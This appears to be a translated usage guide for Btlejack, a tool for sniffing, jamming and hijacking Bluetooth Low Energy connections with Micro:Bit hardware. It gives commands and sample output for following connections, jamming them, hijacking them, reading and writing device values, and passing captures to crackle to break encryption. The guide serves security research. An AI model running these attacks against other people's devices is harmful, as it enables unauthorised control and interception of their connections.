Btlejack: The Ultimate Toolbox for Low Energy Bluetooth Devices

Btlejack provides everything you need to sniff, interfere with, and hijack low energy Bluetooth devices. It relies on one or more BBC Micro:Bits running dedicated firmware. You may also want to use Adafruit’s Bluefruit LE Sniffer or the nRF51822 evaluation kit, as we have added support for these devices.

The current version of the tool (2.0) supports BLE 4.x and 5.x. However, support for BLE 5.x is limited as it only supports the 1Mbps uncoded PHY mode and does not support channel map updates.

Environment Requirements

You need a UNIX-based system (e.g., Raspberry Pi). If you are using a BBC Micro:Bit, you will need one to three Micro:Bit devices (three is recommended), and each device should have a free USB port. The power consumption of the Micro:Bit is quite low, so you can power the recommended three units using a single USB port and a passive hub.

If you connect three microbits to your computer simultaneously, Btlejack will be able to sniff each advertising channel, giving you more opportunities to capture connection requests.

Installation

First, install the btlejack Python3 client software using Pip:

$ sudo pip3 install btlejack

Then, connect the Micro:Bit device to the computer using a USB cable, install the related mass storage device (the mount point must contain MICROBIT), and execute the following command:

$ btlejack -i

This will program each Micro:Bit device connected to your computer to work with Btlejack. It will use the correct firmware version for the current client software, so it is highly recommended to perform this firmware installation process every time you update Btlejack.

If you are using the Bluefruit LE Sniffer or the nRF51822 evaluation kit, please use an external SWD programmer to flash this firmware onto your device.

Keep your devices connected!

Note: This only works with POSIX-compliant systems.

Usage

Btlejack can:

Use various devices

Sniff existing BLE connections

Sniff new BLE connections

Interfere with existing BLE connections

Hijack existing BLE connections

Export captured packets in various PCAP formats

Specify Devices to Use

Btlejack will usually try to automatically detect and use connected compatible devices (currently only Micro:Bit), but since the firmware can be hacked or modified to work with other nRF51822-based boards, it provides specific options that allow compatibility with these devices.

The -d option allows you to specify one or more devices for Btlejack. Note that this option will disable automatic detection of devices, and you should add any number of devices as needed:

$ btlejack -d /dev/ttyACM0 -d /dev/ttyACM2 -s

Sniff Existing Connections

First, use btlejack to find the existing connections of the target:

$ btlejack -sBtleJack version 1.1[i] Enumerating existing connections ...[ - 54 dBm] 0xcd91d517 | pkts: 1[ - 46 dBm] 0xcd91d517 | pkts: 2

The first value (in dBm) indicates the power of the signal; the higher this value, the better the sniffed connection.

The second value (in hex) is the associated access address, a 32-bit value used to identify the link between two Bluetooth low energy compatible devices.

The last value is the number of packets seen using this access address. The higher this value, the more likely it is to use the corresponding access address.

Then, use the -f option to track a specific connection:

$ btlejack -f 0xdda4845eBtleJack version 1.1[i] Detected sniffers: &gt; Sniffer #0: fw version 1.1[i] Synchronizing with connection 0xdda4845e ...✓ CRCInit: 0x2a035e✓ Channel Map = 0x1fffffffff✓ Hop interval = 39✓ Hop increment = 15[i] Synchronized, packet capture in progress ...LL Data: 02 07 03 00 04 00 0a 03 00LL Data: 0a 08 04 00 04 00 0b 5a 69 70LL Data: 02 07 03 00 04 00 0a 03 00LL Data: 0a 08 04 00 04 00 0b 5a 69 70

If you use more than one microbit, Btlejack will parallelize some sniffing operations to speed up the recovery of connection parameters!

Sniff New Connections

The -c option supported by btlejack allows you to specify the target BD address, or you can use any to capture any new connections created.

$ btlejack -c anyBtleJack version 1.1[i] Detected sniffers: &gt; Sniffer #0: version 1.1 &gt; Sniffer #1: version 1.1LL Data: 05 22 df b4 6f 95 c5 55 c0 0a f6 99 23 40 1d 7b 2f 0a 9a f4 93 01 12 00 27 00 00 00 d0 07 ff ff ff ff 1f 0b[i] Got CONNECT_REQ packet from 55:c5:95:6f:b4:df to 40:23:99:f6:0a:c0 |-- Access Address: 0x0a2f7b1d |-- CRC Init value: 0x93f49a |-- Hop interval: 39 |-- Hop increment: 11 |-- Channel Map: 1fffffffff |-- Timeout: 20000 msLL Data: 03 09 08 0f 00 00 00 00 00 00 00LL Data: 03 09 08 0f 00 00 00 00 00 00 00LL Data: 0b 06 0c 08 0f 00 09 41LL Data: 03 06 0c 07 1d 00 d3 07

Alternatively, you may also want to specify the target BD address:

$ btlejack -c 03:e1:f0:00:11:22

Interfere with Connections

Once a connection is identified by its access address, you can use the -j option to interfere with it:

$ btlejack -f 0x129f3244 -j̀

Hijack BLE Connections

You can also use the -t option to hijack an existing connection. Once hijacked, Btlejack will prompt you to interact with the hijacked device.

First, hijack the existing connection:

$ btlejack -f 0x9c68fd30 -t -m 0x1fffffffffBtleJack version 1.1[i] Using cached parameters (created on 2018-08-11 01:48:24)[i] Detected sniffers: &gt; Sniffer #0: fw version 1.1[i] Synchronizing with connection 0x9c68fd30 ...✓ CRCInit: 0x81f733✓ Channel map is provided: 0x1fffffffff✓ Hop interval = 39✓ Hop increment = 9[i] Synchronized, hijacking in progress ...[i] Connection successfully hijacked, it is all yours 
/btlejack&gt;

Then use the following commands to interact with the device: – discover: performs services and characteristics enumeration, providing you with all information about services and characteristics – write: writes data to a specific value handle – read: reads data from a specific value handle – ll: sends raw link layer packets (for ninjas)

Discover Command

The discover command will send and receive Bluetooth LE packets and retrieve all service UUIDs and parameters, as well as characteristic UUIDs and parameters:

btlejack&gt; discoverstart: 0001 end: 0005start: 0014 end: 001astart: 0028 end: ffff Discovered services:Service UUID: 1801 Characteristic UUID: 2a05   | handle: 0002   | properties: indicate  (20)   
 value handle: 0003Service UUID: 1800 Characteristic UUID: 2a04   | handle: 0019   | properties: read  (02)   
 value handle: 001a Characteristic UUID: 2a00   | handle: 0015   | properties: read  (02)   
 value handle: 0016 Characteristic UUID: 2a01   | handle: 0017   | properties: read  (02)   
 value handle: 0018Service UUID: 1824 Characteristic UUID: 2abc   | handle: 0029   | properties: write indicate  (28)   
 value handle: 002a

Read Command

The read command takes a single parameter, which is the value handle corresponding to the characteristic from which to read:

btlejack&gt; read 0x16read&gt;&gt; 4c 47 20 77 65 62 4f 53 20 54 56

Write Command

The write command takes three parameters:

btlejack&gt; write &lt;value handle&gt; &lt;data format&gt; &lt;data&gt;

Supported data formats:

hex: hexadecimal data (e.g., “414261”)

str: text string, can be enclosed in double quotes

LL Command

The last command allows you to send Bluetooth low energy link layer PDUs in hexadecimal format, as described in Volume 6, Part B, Chapter 2.4.

PCAP File Export

One interesting feature of Btlejack is the ability to export captured data to PCAP files.

Btlejack supports the following DLT formats:

DLT_BLUETOOTH_LE_LL_WITH_PHDR

DLT_NORDIC_BLE

DLT_BLUETOOTH_LE_LL

You can specify the output file using the -o option, and the output format can be specified using the -x option. Valid format values are: ll_phdr, nordic, or pcap (default).

$ btlejack -f 0xac56bc12 -x nordic -o capture.nordic.pcap

The ll_phdr export type is very useful when sniffing encrypted connections as it is also supported by crackle. Therefore, if you want to sniff and disconnect encrypted connections, this is a great choice.

You may also need to use the -s option to tell crackle to use a specific cracking strategy:

$ crackle -i some.pcap -s 1

Connection Cache

Btlejack uses a connection cache to store some connection-related values to improve speed. This connection cache may cause some issues, especially in cases where the access address has been seen.

You can refresh this cache using the -z option:

$ btlejack -z

Use Wireshark to Dump Real-Time Packets

Btlejack 2.0 introduces a new -w option that allows you to specify a FIFO path (existing or not) for real-time analysis of packets:

$ btlejack -c any -w /tmp/blepipe

You can even use both FIFO and output files simultaneously:

$ btlejack -c any -w /tmp/blepipe -o blepackets.pcap

Using Btlejack on Raspberry Pi

If you previously enabled virtual Ethernet (RNDIS) via USB, for example, to set up a Raspberry Pi Zero W via USB, you need to disable it again (i.e., remove dtoverlay=dwc2 from boot/config.txt, and modules-load=dwc2,g_ether from boot/cmdline.txt, then reboot sudo), otherwise it will interfere with the USB connection of the sniffer.

Bluetooth LE 5 & 5.1 Support

This version supports Bluetooth low energy versions 5 and 5.1, particularly the new channel selection algorithm introduced in version 5 (CSA #2). However, due to hardware limitations, it can only sniff, interfere with, and hijack connections using the 1Mbps uncoded PHY mode.

Additionally, note that the current implementation of CSA #2 included in Btlejack does not support channel map updates.

Sniff New BLE 5 Connections

Btlejack will automatically detect the channel selection algorithm being used, so you don’t have to worry, just capture packets as usual.

Sniff Existing BLE 5 Connections

Sniffing existing BLE 5 connections (using the 1Mbps uncoded PHY mode, only this PHY) is not too difficult. First, you must specify the target BLE 5 connection using the -5 option. Note that it is not possible to determine whether an existing connection is using CSA #2 or CSA #1, so you must try both techniques until one works.

$ btlejack -f 0x11223344 -5

Then, Btlejack will recover the channel map and hop interval values being used for this connection:

$ btlejack -f 0x11223344 -5[i] Synchronizing with connection 0x11223344 ...✓ CRCInit: 0x40d64f✓ Channel Map = 0x1fffffffff✓ Hop interval = 160

Then it will attempt to recover the PRNG counter value for this connection:

$ btlejack -f 0x11223344 -5[i] Synchronizing with connection 0x11223344 ...✓ CRCInit: 0x40d64f✓ Channel Map = 0x1fffffffff✓ Hop interval = 160✓ CSA2 PRNG counter = 5137[i] Synchronized, packet capture in progress ...

Once done, Btlejack will synchronize with this connection and process packets.

Interfere with Existing BLE 5 Connections

There is nothing new here, except you must specify the BLE 5 connection to attack using the -5 option.

Note that you can optimize this attack by specifying the channel map and hop interval values to use with the -m and -p flags, respectively. Both must be provided simultaneously unless they do not work.

Hijack Existing BLE 5 Connections

At this time, I have not managed to hijack a BLE 5 connection, as this attack is time-sensitive. My BLE 5 device uses zero latency, so it does not delay and causes this attack to fail.

When I get some legitimate BLE 5 devices, I will improve this.

*References: GitHub, FB Editor secist compilation, please indicate from FreeBuf.COM

Recommended Highlights